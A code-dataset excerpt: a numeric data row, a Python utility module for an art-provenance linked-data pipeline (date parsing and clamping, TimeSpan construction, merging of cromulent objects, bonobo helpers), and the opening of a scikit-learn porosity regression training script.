0 -21 -37 163 0 42 137 190 0 -123 -70 50 0 9 127 187 0 16 169 -114 0 179 142 28 0 7 147 191 0 48 -58 -198 0 -118 -10 185 0 57 -107 -106 0 65 96 173 0 54 64 66 0 -160 193 -101 0 199 65 -76 0 -141 138 157 0 81 102 163 0 180 -132 -134 0 154 5 175 0 -120 42 -64 0 109 -143 88 0 75 71 77 0 -19 -10 -123 0 12 45 71 0 127 -158 199 0 98 -198 120 0 -116 129 166 0 124 -186 -34 0 -63 -140 195 0 -162 172 19 0 190 107 76 0 -108 -193 -24 0 -54 -148 -132 0 158 184 83 0 -75 -4 101 0 49 96 17 0 -19 104 -73 0 197 159 101 0 172 196 3 0 -132 192 -120 0 -151 -92 -200 0 -147 -128 -179 0 89 188 191 0 -152 -102 -175 0 177 -133 -127 0 -69 -80 -154 0 160 -122 -67 0 117 95 31 0 187 -114 55 0 -52 102 -18 0 -34 -111 -131 0 70 93 -152 0 -72 -58 -60 0 -151 196 -59 0 12 -159 -1 0 -173 133 167 0 198 61 166 0 -188 94 8 0 -156 39 -2 0 184 -151 -89 0 -112 -160 -144 0 156 35 123 0 27 -84 105 0 -166 -50 157 0 -168 -26 179 0 74 96 94 0 199 195 178 0 114 -27 144 0 48 105 53 0 128 -117 -34 0 -28 -109 -159 0 197 40 23 0 142 20 -42 0 -21 103 -12 0 122 -31 40 0 -24 -10 -57 0 110 -123 72 0 114 20 -160 0 -14 94 -121 0 -31 195 -163 0 -98 -45 143 0 -110 -3 -195 0 142 86 -186 0 194 -125 28 0 -60 129 -180 0 134 141 197 0 -92 -68 30 0 182 6 96 0 146 -195 14 0 -78 -56 -61 0 -78 139 144 0 -190 -48 -163 0 -19 -40 -181 0 -92 -191 25 0 -156 122 38 0 195 13 -190 0 99 -57 -184 0 141 -124 -113 0 -81 38 40 0 68 199 -12 0 -178 -118 -20 0 -188 183 -96 0 190 144 121 0 43 -111 40 0 -10 -39 -68 0 -42 -17 83 0 -135 -101 -82 0 -153 198 -23 0 -188 -86 146 0 -26 -126 -89 0 -113 135 93 0 -161 20 -162 0 165 1 106 0 -159 -27 79 0 78 -60 184 0 79 -53 -166 0 106 170 -55 0 -19 -30 90 0 -152 176 56 0 -108 91 -50 0 -104 100 -171 0 85 -197 -93 0 99 106 12 0 20 -108 -103 0 -142 -92 137 0 70 75 -10 0 30 51 -129 0 -132 -38 63 0 -59 66 48 0 -88 -118 43 0 -71 200 -182 0 6 -177 -172 0 | 1.960158 | 2 |
pipeline/util/__init__.py | kasei/pipeline | 5 | 6632504 | import re
import os
import sys
import fnmatch
import pprint
import calendar
import datetime
from threading import Lock
from contextlib import ContextDecorator, suppress
from collections import defaultdict, namedtuple
import warnings
import dateutil.parser
from bonobo.config import Configurable, Option, Service
import settings
import pipeline.io.arches
from cromulent import model, vocab
from cromulent.model import factory, BaseResource
from pipeline.linkedart import add_crom_data
UNKNOWN_DIMENSION = 'http://vocab.getty.edu/aat/300055642'
# Dimension = namedtuple("Dimension", [
# 'value', # numeric value
# 'unit', # unit
# 'which' # e.g. width, height, ...
# ])
#
def identity(d):
'''
Simply yield the value that is passed as an argument.
This is trivial, but necessary for use in constructing some bonobo graphs.
For example, if two already instantiated graph chains need to be connected,
one being used as input to the other, bonobo does not allow this:
`graph.add_chain(_input=prefix.output, _output=suffix.input)`
Instead, the `add_chain` call requires at least one graph node to be added. Hence:
`graph.add_chain(identity, _input=prefix.output, _output=suffix.input)`
'''
yield d
def extract_date_tuple(data:dict, prefix:str=''):
'''
Given a dict `data` and a string `prefix`, extract year, month, and day elements
from `data` (e.g. '{prefix}year', '{prefix}month', and '{prefix}day'), and return
them as a tuple.
'''
year = data.get(f'{prefix}year')
month = data.get(f'{prefix}month', data.get(f'{prefix}mo'))
day = data.get(f'{prefix}day')
return (year, month, day)
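# Illustrative usage sketch (the 'sale_' prefix and field names are made-up
# examples): the month element may come from either '{prefix}month' or the
# abbreviated '{prefix}mo' field.
def _example_extract_date_tuple():
	data = {'sale_year': '1804', 'sale_mo': '6', 'sale_day': '21'}
	assert extract_date_tuple(data, 'sale_') == ('1804', '6', '21')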
def implode_date_tuple(date_tuple, clamp):
'''
Given a date string tuple `(year, month, day)`, return an ISO 8601 date
string ('YYYY-MM-DD'). If the day, or day and month elements are missing,
may also return a year-month ('YYYY-MM') or year ('YYYY') string.
If `clamp='begin'` and a year value is found, the resulting date string will use
the earliest valid value for any field (month or day) that is not present or false.
For example, '1800-02' would become '1800-02-01'.
If `clamp='end'`, clamping occurs using the latest valid values. For example,
'1800-02' would become '1800-02-28'.
If `clamp='eoe'` ('end of the end'), clamping occurs using the first value that is
*not* valid. That is, the returned value may be used as an exclusive endpoint for a
date range. For example, '1800-02' would become '1800-03-01'.
'''
year, month, day = date_tuple
try:
year = int(year)
except:
return None
try:
month = int(month)
if month < 1 or month > 12:
raise ValueError(f'Month value is not valid: {month}')
except Exception as e:
if clamp == 'begin':
month = 1
day = 1
return '%04d-%02d-%02d' % (int(year), month, day)
elif clamp == 'end':
day = 31
month = 12
return '%04d-%02d-%02d' % (int(year), month, day)
elif clamp == 'eoe':
day = 1
month = 1
year += 1
return '%04d-%02d-%02d' % (int(year), month, day)
else:
return '%04d' % (int(year),)
max_day = calendar.monthrange(year, month)[1]
try:
day = int(day)
if day < 1 or day > 31:
raise ValueError(f'Day value is not valid: {day}')
if clamp == 'eoe':
day += 1
if day > max_day:
day = 1
month += 1
if month > 12:
month = 1
year += 1
except Exception as e:
if clamp == 'begin':
day = 1
elif clamp == 'end':
day = max_day
elif clamp == 'eoe':
day = 1
month += 1
if month > 12:
month = 1
year += 1
else:
if type(e) not in (TypeError, ValueError):
warnings.warn(f'Failed to interpret day value {day!r} in implode_date: {e}')
				pprint.pprint(date_tuple, stream=sys.stderr)
try:
if year and month and day:
return '%04d-%02d-%02d' % (int(year), month, day)
elif year and month:
return '%04d-%02d' % (int(year), month)
elif year:
return '%04d' % (int(year),)
except TypeError as e:
warnings.warn(f'*** {e}: {pprint.pformat([int(year), month, day])}')
return None
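# Illustrative expectations mirroring the clamping rules documented above
# (a sketch, not part of the original module): February 1800 has 28 days, so
# 'end' clamps to the 28th and 'eoe' rolls over to the first of March.
def _example_implode_date_tuple():
	assert implode_date_tuple(('1800', '02', None), clamp='begin') == '1800-02-01'
	assert implode_date_tuple(('1800', '02', None), clamp='end') == '1800-02-28'
	assert implode_date_tuple(('1800', '02', None), clamp='eoe') == '1800-03-01'
	assert implode_date_tuple(('1800', '02', None), clamp=None) == '1800-02'
	assert implode_date_tuple((None, '02', '14'), clamp='begin') is None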
def implode_uncertain_date_tuple(date_tuple, clamp):
'''
Similar to `implode_date_tuple`, returns an ISO 8601 date string based
on the supplied date tuple. However, this method will handle date tuples
with zero-valued day or month fields.
'''
year, month, day = date_tuple
try:
year = int(year)
except:
warnings.warn('year is not numeric')
return None
try:
month = int(month)
if month < 0 or month > 12:
raise ValueError(f'Month value is not valid: {month}')
except Exception as e:
if clamp == 'begin':
day = day if month == 0 else 1 # keep the day value if there's month uncertainty
month = 1
elif clamp in ('end', 'eoe'):
day = day if month == 0 else 31 # keep the day value if there's month uncertainty
month = 12
else:
			warnings.warn('month is not a valid number')
return None
if month == 0:
max_day = 31
if clamp in ('end', 'eoe'):
month = 12
else:
month = 1
else:
max_day = calendar.monthrange(year, month)[1]
try:
day = int(day)
if day == 0:
if clamp in ('end', 'eoe'):
day = max_day
else:
day = 1
elif day < 1 or day > 31:
raise ValueError(f'Day value is not valid: {day}')
if clamp == 'eoe':
day += 1
if day > max_day:
day = 1
month += 1
if month > 12:
month = 1
year += 1
except Exception as e:
if clamp == 'begin':
day = 1
elif clamp == 'end':
day = max_day
elif clamp == 'eoe':
day = 1
month += 1
if month > 12:
month = 1
year += 1
else:
if type(e) not in (TypeError, ValueError):
warnings.warn(f'Failed to interpret day value {day!r} in implode_date: {e}')
				pprint.pprint(date_tuple, stream=sys.stderr)
try:
if day:
return '%04d-%02d-%02d' % (int(year), month, day)
elif month:
return '%04d-%02d' % (int(year), month)
elif year:
return '%04d' % (int(year),)
except TypeError as e:
warnings.warn(f'*** {e}: {pprint.pformat([int(year), month, day])}')
warnings.warn('fallthrough')
return None
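# Illustrative expectations for the zero-valued ('uncertain') month/day fields
# that implode_date_tuple does not accept (a sketch, not part of the module):
def _example_implode_uncertain_date_tuple():
	assert implode_uncertain_date_tuple(('1800', '06', '0'), clamp='begin') == '1800-06-01'
	assert implode_uncertain_date_tuple(('1800', '06', '0'), clamp='end') == '1800-06-30'
	assert implode_uncertain_date_tuple(('1800', '06', '0'), clamp='eoe') == '1800-07-01'
	assert implode_uncertain_date_tuple(('1800', '0', '15'), clamp='begin') == '1800-01-15'
	assert implode_uncertain_date_tuple(('1800', '0', '15'), clamp='end') == '1800-12-15'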
def implode_date(data:dict, prefix:str='', clamp:str=None):
'''
Given a dict `data` and a string `prefix`, extract year, month, and day elements
from `data` (with `extract_date_tuple`), and return an ISO 8601 date string
('YYYY-MM-DD') using `implode_date_tuple`.
'''
date_tuple = extract_date_tuple(data, prefix)
return implode_date_tuple(date_tuple, clamp)
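# Illustrative example (the field values are made up): implode_date is just
# extract_date_tuple followed by implode_date_tuple, so clamping fills in the
# missing month/day fields.
def _example_implode_date():
	data = {'year': '1820', 'month': '', 'day': ''}
	assert implode_date(data) == '1820'
	assert implode_date(data, clamp='begin') == '1820-01-01'
	assert implode_date(data, clamp='eoe') == '1821-01-01'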
class ExclusiveValue(ContextDecorator):
_locks = {}
lock = Lock()
def __init__(self, wrapped):
self._wrapped = wrapped
def get_lock(self):
_id = self._wrapped
with ExclusiveValue.lock:
if not _id in ExclusiveValue._locks:
ExclusiveValue._locks[_id] = Lock()
return ExclusiveValue._locks[_id]
def __enter__(self):
self.get_lock().acquire()
return self._wrapped
def __exit__(self, *exc):
self.get_lock().release()
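# Illustrative usage sketch ('urn:example:1' is a made-up key): ExclusiveValue
# serializes access across threads by keying a lock on the wrapped value, so
# only one thread at a time runs the block for any given value.
def _example_exclusive_value(shared_uri='urn:example:1'):
	with ExclusiveValue(shared_uri) as uri:
		# critical section for this particular value
		return uri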
def configured_arches_writer():
return pipeline.io.arches.ArchesWriter(
endpoint=settings.arches_endpoint,
auth_endpoint=settings.arches_auth_endpoint,
username=settings.arches_endpoint_username,
password=settings.arches_endpoint_password,
client_id=settings.arches_client_id
)
class CromObjectMerger:
def __init__(self):
self.attribute_based_identity = {
# NOTE: It's important that these attribute-based identity rules are
# based on crom classes that will not be top-level resources in Arches.
# That is, they must only be referenced from within a top-level
# resource, and not across resource boundaries. This is because during a
			# merge, only one value will be preserved for non-multiple properties
# that differ between input objects such as `id` (and so anything
# referencing an `id` value that is dropped will be left with a dangling
# pointer).
'content': (model.Name, model.Identifier),
'value': (model.Dimension,),
}
self.metatyped_attribute_based_identity = {
# This is similar to `self.attribute_based_identity`, but instead of being
# based on the `type` of the object, it is based on the meta-type value
# (the `obj.classified_as.classified_as` value)
# of the object
'content': (vocab._BriefText,),
}
# instead of mapping to a tuple of classes, `self._metatyped_attribute_based_identity`
# maps to a list of sets of URIs (the set of classifications that must be present to be
# interpreted as a member of the class)
self._metatyped_attribute_based_identity = {}
for attr, classes in self.metatyped_attribute_based_identity.items():
id_sets = []
for c in classes:
o = c()
ids = {mt.id for cl in o.classified_as for mt in getattr(cl, 'classified_as', [])}
id_sets.append(ids)
self._metatyped_attribute_based_identity[attr] = id_sets
def merge(self, obj, *to_merge):
if not to_merge:
return obj
# print(f'merge called with {1+len(to_merge)} objects: ({obj}, {to_merge})')
for m in to_merge:
if obj == m:
continue
for p in m.list_my_props():
try:
value = getattr(m, p)
if value is not None:
if isinstance(value, list):
self.set_or_merge(obj, p, *value)
else:
self.set_or_merge(obj, p, value)
except AttributeError:
pass
return obj
def _classify_values(self, values, identified, unidentified):
for v in values:
handled = False
for attr, classes in self.attribute_based_identity.items():
if isinstance(v, classes) and hasattr(v, attr):
identified[getattr(v, attr)].append(v)
handled = True
break
for attr, id_sets in self._metatyped_attribute_based_identity.items():
if handled:
break
if hasattr(v, 'classified_as') and hasattr(v, attr):
obj_ids = {mt.id for cl in v.classified_as for mt in getattr(cl, 'classified_as', [])}
for id_set in id_sets:
if id_set <= obj_ids:
identified[getattr(v, attr)].append(v)
handled = True
break
if not handled:
try:
i = v.id
if i:
identified[i].append(v)
else:
unidentified.append(v)
except AttributeError:
unidentified.append(v)
if len(identified) > 1 and UNKNOWN_DIMENSION in identified:
# drop the Unknown physical dimension (300055642)
del(identified[UNKNOWN_DIMENSION])
def set_or_merge(self, obj, p, *values):
if p == 'type':
# print('*** TODO: calling setattr(_, "type") on crom objects throws; skipping')
return
existing = []
try:
e = getattr(obj, p)
if isinstance(e, list):
existing = e
else:
existing = [e]
except AttributeError:
pass
identified = defaultdict(list)
unidentified = []
self._classify_values(values, identified, unidentified)
allows_multiple = obj.allows_multiple(p)
if identified:
# there are values in the new objects that have to be merged with existing identifiable values
self._classify_values(existing, identified, unidentified)
setattr(obj, p, None) # clear out all the existing values
if allows_multiple:
for _, v in sorted(identified.items()):
setattr(obj, p, self.merge(*v))
for v in unidentified:
setattr(obj, p, v)
else:
try:
identified_values = sorted(identified.values())[0]
except TypeError:
# in case the values cannot be sorted
identified_values = list(identified.values())[0]
setattr(obj, p, self.merge(*identified_values))
if unidentified:
warnings.warn(f'*** Dropping {len(unidentified)} unidentified values for property {p} of {obj}')
# unidentified_value = sorted(unidentified)[0]
# setattr(obj, p, unidentified_value)
else:
# there are no identifiable values in the new objects, so we can just append them
if allows_multiple:
for v in unidentified:
setattr(obj, p, v)
else:
if unidentified:
if len(unidentified) > 1:
warnings.warn(f'*** Dropping {len(unidentified)-1} extra unidentified values for property {p} of {obj}')
try:
if hasattr(obj, p):
values = set(unidentified + [getattr(obj, p)])
else:
values = set(unidentified)
value = sorted(values)[0]
except TypeError:
# in case the values cannot be sorted
value = unidentified[0]
setattr(obj, p, None)
setattr(obj, p, value)
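# Illustrative sketch of the merge behaviour (the URI is a made-up example):
# two Name objects with the same 'content' are treated as identical under
# attribute_based_identity, so the merged person should keep only one Name.
def _example_crom_object_merger():
	merger = CromObjectMerger()
	a = model.Person(ident='urn:example:person')
	a.identified_by = model.Name(ident='', content='Rembrandt')
	b = model.Person(ident='urn:example:person')
	b.identified_by = model.Name(ident='', content='Rembrandt')
	merged = merger.merge(a, b)
	return merged.identified_by  # expected: a single merged Name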
class ExtractKeyedValues(Configurable):
'''
	Given a `dict` representing some object, extract an array of `dict` values from
the `key` member. To each of the extracted dictionaries, add a 'parent_data' key with
the value of the original dictionary. Yield each extracted dictionary.
'''
key = Option(str, required=True)
include_parent = Option(bool, default=True)
def __init__(self, *v, **kw):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(*v, **kw)
self.__name__ = f'{type(self).__name__} ({self.key})'
def __call__(self, data, *args, **kwargs):
for a in data.get(self.key, []):
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
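# Illustrative usage sketch (the '_prices' key and record fields are made up):
# ExtractKeyedValues fans a list-valued key out into individual records, each
# carrying a 'parent_data' back-reference to the original record.
def _example_extract_keyed_values():
	xkv = ExtractKeyedValues(key='_prices')
	record = {'record_no': '123', '_prices': [{'amount': '10'}, {'amount': '12'}]}
	children = list(xkv(record))
	assert len(children) == 2
	assert children[0]['parent_data'] is record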
class ExtractKeyedValue(Configurable):
'''
	Given a `dict` representing some object, extract the `key` member (a dict).
	To the extracted dictionary, add a 'parent_data' key with
	the value of the original dictionary. Yield the extracted dictionary.
'''
key = Option(str, required=True)
include_parent = Option(bool, default=True)
def __init__(self, *v, **kw):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
super().__init__(*v, **kw)
self.__name__ = f'{type(self).__name__} ({self.key})'
def __call__(self, data, *args, **kwargs):
a = data.get(self.key)
if a:
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
class RecursiveExtractKeyedValue(ExtractKeyedValue):
include_self = Option(bool, default=True)
def __call__(self, data, *args, **kwargs):
if self.include_self:
a = data
else:
a = data.get(self.key)
while a:
child = {k: v for k, v in a.items()}
child.update({
'parent_data': data,
})
yield child
data = a
a = a.get(self.key)
class MatchingFiles(Configurable):
'''
Given a path and a pattern, yield the names of all files in the path that match the pattern.
'''
path = Option(str)
pattern = Option(default='*')
fs = Service(
'fs',
__doc__='''The filesystem instance to use.''',
) # type: str
def __init__(self, *args, **kwargs):
'''
Sets the __name__ property to include the relevant options so that when the
bonobo graph is serialized as a GraphViz document, different objects can be
visually differentiated.
'''
		super().__init__(*args, **kwargs)
self.__name__ = f'{type(self).__name__} ({self.pattern})'
def __call__(self, *, fs, **kwargs):
count = 0
if not self.pattern:
return
# print(repr(self.pattern))
subpath, pattern = os.path.split(self.pattern)
fullpath = os.path.join(self.path, subpath)
for f in sorted(fs.listdir(fullpath)):
if fnmatch.fnmatch(f, pattern):
yield os.path.join(subpath, f)
count += 1
if not count:
sys.stderr.write(f'*** No files matching {pattern} found in {fullpath}\n')
def make_ordinal(n):
n = int(n)
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return f'{n}{suffix}'
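# Quick sanity examples for make_ordinal (illustrative only): the 11-13
# special case overrides the last-digit rule.
def _example_make_ordinal():
	assert make_ordinal(1) == '1st'
	assert make_ordinal(2) == '2nd'
	assert make_ordinal(11) == '11th'
	assert make_ordinal(23) == '23rd'
	assert make_ordinal(112) == '112th'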
def timespan_for_century(century, narrow=False, inclusive=False, **kwargs):
'''
	Given an integer representing a century (e.g. 17 for the 17th century), return a
TimeSpan object for the bounds of that century.
If `narrow` is True, the bounding properties will be `end_of_the_begin` and
`begin_of_the_end`; otherwise they will be `begin_of_the_begin` and `end_of_the_end`.
'''
ord = make_ordinal(century)
ts = model.TimeSpan(ident='', label=f'{ord} century')
from_year = 100 * (century-1)
to_year = from_year + 100
if narrow:
ts.end_of_the_begin = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (from_year, 1, 1, 0, 0, 0)
ts.begin_of_the_end = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (to_year, 1, 1, 0, 0, 0)
else:
ts.begin_of_the_begin = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (from_year, 1, 1, 0, 0, 0)
ts.end_of_the_end = "%04d-%02d-%02dT%02d:%02d:%02dZ" % (to_year, 1, 1, 0, 0, 0)
return ts
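# Illustrative usage (a sketch, not part of the module): with narrow=False the
# 17th century spans 1600-01-01 inclusive to 1700-01-01 exclusive.
def _example_timespan_for_century():
	ts = timespan_for_century(17)
	assert ts._label == '17th century'
	assert ts.begin_of_the_begin == '1600-01-01T00:00:00Z'
	assert ts.end_of_the_end == '1700-01-01T00:00:00Z'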
def dates_for_century(century):
'''
	Given an integer representing a century (e.g. 17 for the 17th century), return a
tuple of dates for the bounds of that century.
'''
from_year = 100 * (century-1)
to_year = from_year + 100
begin = datetime.datetime(from_year, 1, 1)
end = datetime.datetime(to_year, 1, 1)
return (begin, end)
def timespan_before(after):
ts = model.TimeSpan(ident='')
try:
ts.end_of_the_end = after.begin_of_the_begin
with suppress(AttributeError):
l = f'Before {after._label}'
			ts.identified_by = model.Name(ident='', content=l)
ts._label = l
return ts
except AttributeError:
return None
def timespan_after(before):
ts = model.TimeSpan(ident='')
try:
ts.begin_of_the_begin = before.end_of_the_end
with suppress(AttributeError):
l = f'After {before._label}'
			ts.identified_by = model.Name(ident='', content=l)
ts._label = l
return ts
except AttributeError:
return None
def replace_key_pattern(pat, rep, value):
r = re.compile(pat)
d = {}
for k, v in value.items():
m = r.search(k)
if m:
d[k.replace(m.group(1), rep, 1)] = v
else:
d[k] = v
return d
def strip_key_prefix(prefix, value):
'''
Strip the given `prefix` string from the beginning of all keys in the supplied `value`
dict, returning a copy of `value` with the new keys.
'''
d = {}
for k, v in value.items():
if k.startswith(prefix):
d[k.replace(prefix, '', 1)] = v
else:
d[k] = v
return d
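# Illustrative example (hypothetical keys): only keys carrying the prefix are
# renamed; everything else passes through unchanged.
def _example_strip_key_prefix():
	row = {'seller_name': 'Sotheby', 'seller_loc': 'London', 'lot': '12'}
	assert strip_key_prefix('seller_', row) == {'name': 'Sotheby', 'loc': 'London', 'lot': '12'}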
def label_for_timespan_range(begin, end, inclusive=False):
'''
Returns a human-readable string for labeling the timespan with the given bounds.
	The `inclusive` flag indicates whether the upper bound given by `end` is inclusive
	or exclusive. If `end` is exclusive, the label takes this into account when creating
	a human-readable string. For example, if the upper bound is '2019-12-01', exclusive,
	the human-readable label should indicate a timespan ending at the end of November.
'''
if begin and end:
pass
elif begin:
return f'{begin} onwards'
elif end:
return f'up to {end}'
if begin == end:
return begin
if isinstance(begin, datetime.datetime):
begin = begin.strftime("%Y-%m-%d")
if isinstance(end, datetime.datetime):
end = end.strftime("%Y-%m-%d")
orig_begin = begin
orig_end = end
if begin.count('-') != 2:
if not inclusive:
raise Exception(f'truncated date strings must operate in inclusive mode in label_for_timespan_range: {begin}')
begin = implode_date(dict(zip(('year', 'month', 'day'), (begin.split('-', 3) + ['', '', ''])[:3])), clamp='begin')
if end.count('-') != 2:
if not inclusive:
raise Exception(f'truncated date strings must operate in inclusive mode in label_for_timespan_range: {end}')
end = implode_date(dict(zip(('year', 'month', 'day'), (end.split('-', 3) + ['', '', ''])[:3])), clamp='end' if inclusive else 'eoe')
beginparts = list(map(int, begin.split('-')))
endparts = list(map(int, end.split('-')))
from_y, from_m, from_d = beginparts
to_y, to_m, to_d = endparts
if inclusive:
maxday = calendar.monthrange(to_y, to_m)[1]
if from_y == to_y and from_m == to_m and from_d == 1 and to_d == maxday:
# 1 month range
return '%04d-%02d' % (from_y, from_m)
elif from_y == to_y and from_m == 1 and to_m == 12 and from_d == 1 and to_d == 31:
# 1 year range
return str(from_y)
else:
return f'{orig_begin} to {orig_end}'
else:
if from_y == to_y and from_m == to_m and from_d == to_d - 1:
# 1 day range
return begin
elif from_y == to_y and from_m == to_m - 1 and from_d == to_d and to_d == 1:
# 1 month range
return '%04d-%02d' % (from_y, from_m)
elif from_y == to_y - 1 and from_m == to_m and to_m == 1 and from_d == to_d and to_d == 1:
# 1 year range
return str(from_y)
else:
to_d -= 1
if to_d == 0:
to_m -= 1
if to_m == 0:
to_m = 12
to_y -= 1
to_d = calendar.monthrange(to_y, to_m)[1]
end = '%04d-%02d-%02d' % (to_y, to_m, to_d)
return f'{begin} to {end}'
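# Illustrative expectations (a sketch based on the docstring above): exclusive
# ranges collapse to a month or year label where possible, and otherwise the
# exclusive end date is rolled back by one day.
def _example_label_for_timespan_range():
	assert label_for_timespan_range('1800-01-01', '1801-01-01') == '1800'
	assert label_for_timespan_range('1800-02-01', '1800-03-01') == '1800-02'
	assert label_for_timespan_range('1800-02-01', '1800-02-28', inclusive=True) == '1800-02'
	assert label_for_timespan_range('1800-03-02', '1800-06-10') == '1800-03-02 to 1800-06-09'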
def exploded_date_has_uncertainty(date_tuple):
year, month, day = date_tuple
try:
year = int(year)
month = int(month)
day = int(day)
if month == 0 or day == 0:
return True
except:
pass
return False
def timespan_from_bound_components(data:dict, begin_prefix:str='', begin_clamp:str=None, end_prefix:str='', end_clamp:str=None):
begin_tuple = extract_date_tuple(data, begin_prefix)
end_tuple = extract_date_tuple(data, end_prefix)
uncertain_dates = [exploded_date_has_uncertainty(t) for t in (begin_tuple, end_tuple)]
uncertain_date = any(uncertain_dates)
uncertain_tuple = begin_tuple if uncertain_dates[0] else end_tuple
if uncertain_date:
begin = implode_uncertain_date_tuple(uncertain_tuple, clamp=begin_clamp)
end = implode_uncertain_date_tuple(uncertain_tuple, clamp=end_clamp)
		# for dates with a '00' for month, the end day will already be
		# incremented by implode_uncertain_date_tuple with end_clamp='eoe'
inclusive = end_clamp != 'eoe'
ts = timespan_from_outer_bounds(
begin=begin,
end=end,
inclusive=inclusive
)
else:
begin = implode_date_tuple(begin_tuple, clamp=begin_clamp)
end = implode_date_tuple(end_tuple, clamp=end_clamp)
# we use inclusive=False here, because clamping in the implode_date_tuple
# call will have already handled adjusting the date to handle the 'eoe'
# case (unlike the if case above, where we have to base inclusivity on
# the clamp value)
ts = timespan_from_outer_bounds(
begin=begin,
end=end,
inclusive=False
)
if end_clamp == 'eoe':
end_label = implode_date_tuple(end_tuple, clamp='end')
else:
end_label = end
if uncertain_date:
# attach an Identifier to the timespan that includes the original
# verbatim string values that include the '00' field values
ident_parts = []
begin_str = '-'.join([c for c in begin_tuple if len(c)])
end_str = '-'.join([c for c in end_tuple if len(c)])
uncertain_str = begin_str if uncertain_dates[0] else end_str
# Note: This will use the verbatim string from the uncertain date
# (either begin or end).
ts.identified_by = model.Name(ident='', content=f'{uncertain_str}')
else:
if begin and end:
ts.identified_by = model.Name(ident='', content=f'{begin} to {end_label}')
elif begin:
ts.identified_by = model.Name(ident='', content=f'{begin} onwards')
elif end:
ts.identified_by = model.Name(ident='', content=f'up to {end_label}')
return ts, begin, end
def timespan_from_outer_bounds(begin=None, end=None, inclusive=False):
'''
Return a `TimeSpan` based on the (optional) `begin` and `end` date strings.
If both `begin` and `end` are `None`, returns `None`.
'''
if begin or end:
ts = model.TimeSpan(ident='')
ts._label = label_for_timespan_range(begin, end, inclusive=inclusive)
if begin is not None:
try:
if not isinstance(begin, datetime.datetime):
begin = dateutil.parser.parse(begin)
begin = begin.strftime("%Y-%m-%dT%H:%M:%SZ")
ts.begin_of_the_begin = begin
except ValueError:
warnings.warn(f'*** failed to parse begin date: {begin}')
raise
if end is not None:
try:
if not isinstance(end, datetime.datetime):
end = dateutil.parser.parse(end)
if inclusive:
end += datetime.timedelta(days=1)
end = end.strftime("%Y-%m-%dT%H:%M:%SZ")
ts.end_of_the_end = end
except ValueError:
warnings.warn(f'*** failed to parse end date: {end}')
return ts
return None
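# Minimal usage sketch (assumes the cromulent model imported above): with
# inclusive=False the end date is treated as an exclusive bound, so a full year
# is labelled with just that year.
def _example_timespan_from_outer_bounds():
    ts = timespan_from_outer_bounds('1890-01-01', '1891-01-01', inclusive=False)
    assert ts is not None and ts._label == '1890'
    return ts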
class CaseFoldingSet(set):
def __init__(self, iterable):
        super().__init__()
for v in iterable:
self.add(v)
def __and__(self, value):
return CaseFoldingSet({s for s in value if s in self})
def __or__(self, value):
s = CaseFoldingSet({})
for v in self:
s.add(v)
for v in value:
s.add(v)
return s
def add(self, v):
super().add(v.casefold())
def remove(self, v):
super().remove(v.casefold())
def __contains__(self, v):
return super().__contains__(v.casefold())
def intersects(self, values):
if isinstance(values, CaseFoldingSet):
l = set(self)
r = set(values)
return l & r
else:
for v in values:
if v in self:
return True
return False
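# Usage sketch: membership, union and intersection are case-insensitive because
# every value is casefolded on the way in.
def _example_case_folding_set():
    names = CaseFoldingSet({'Sculpture', 'PAINTING'})
    assert 'painting' in names and 'SCULPTURE' in names
    assert names.intersects(['Painting', 'drawing'])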
def truncate_with_ellipsis(s, length=100):
'''
If the string is too long to represent as a title-like identifier, return a new,
truncated string with a trailing ellipsis that can be used as a title (with the
assumption that the long original value will be represented as a more suitable
string such as a description).
'''
if not isinstance(s, str):
return None
if len(s) <= length:
return None
shorter = ' '.join(s[:length].split(' ')[0:-1]) + '…'
if len(shorter) == 1:
# breaking on spaces did not yield a shorter string;
# {s} must start with at least 100 non-space characters
shorter = s[:length-1] + '…'
return shorter
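# Usage sketch: short strings are left alone (None signals that no truncation is
# needed); long strings are cut at a word boundary and given a trailing ellipsis.
def _example_truncate_with_ellipsis():
    assert truncate_with_ellipsis('A short title') is None
    shortened = truncate_with_ellipsis('word ' * 40, length=20)
    assert shortened is not None and shortened.endswith('…')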
class GraphListSource:
'''
Act as a bonobo graph source node for a set of crom objects.
Yields the supplied objects wrapped in data dicts.
'''
def __init__(self, values, *args, **kwargs):
super().__init__(*args, **kwargs)
self.values = values
def __call__(self):
for v in self.values:
yield add_crom_data({}, v)
def rename_keys(mapping:dict):
return lambda d, p: {mapping[k] if k in mapping else k: v for k, v in d.items()}
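# Usage sketch (the key names here are made up for illustration): rename_keys returns
# a bonobo-compatible callable that renames selected dict keys and leaves the rest alone.
def _example_rename_keys():
    renamer = rename_keys({'auth_name': 'label'})
    assert renamer({'auth_name': 'Rembrandt', 'ulan': 123}, None) == {'label': 'Rembrandt', 'ulan': 123}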
def _as_list(data):
if isinstance(data, list):
return data
elif data is None:
return []
else:
return [data]
| en | 0.811378 | | 2.673648 | 3 |
code/model_training.py | lucaskup/PorosityAnalisys | 0 | 6632505 | <gh_stars>0
import seaborn as sns
from pathlib import Path
import pandas as pd
import numpy as np
import copy
from scipy.stats import t
from sklearn.model_selection import RepeatedKFold
from sklearn.preprocessing import MinMaxScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.svm import SVR
from sklearn.neural_network import MLPRegressor
from sklearn.linear_model import LinearRegression, Ridge, Lasso, ElasticNet
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn.model_selection import cross_validate, KFold, GridSearchCV
from joblib import dump, load
import matplotlib.pyplot as plt
import matplotlib as mpl
mpl.rcParams['figure.dpi'] = 400
# Import the data
dataset = pd.read_csv('../results/featureSelection/featureSelectedData.csv',
index_col=0)
X = dataset.values[:, :-1].astype(np.float64)
Y = dataset['Porosity (%)'].values.astype(np.float64)
mmY = MinMaxScaler()
Y = mmY.fit_transform(Y.reshape(-1, 1)).ravel()
# Auxiliary Functions
n_split = len(X)
kfold_indexes = list(KFold(n_split, shuffle=True).split(X))
def getKfoldIndexes():
return copy.deepcopy(kfold_indexes)
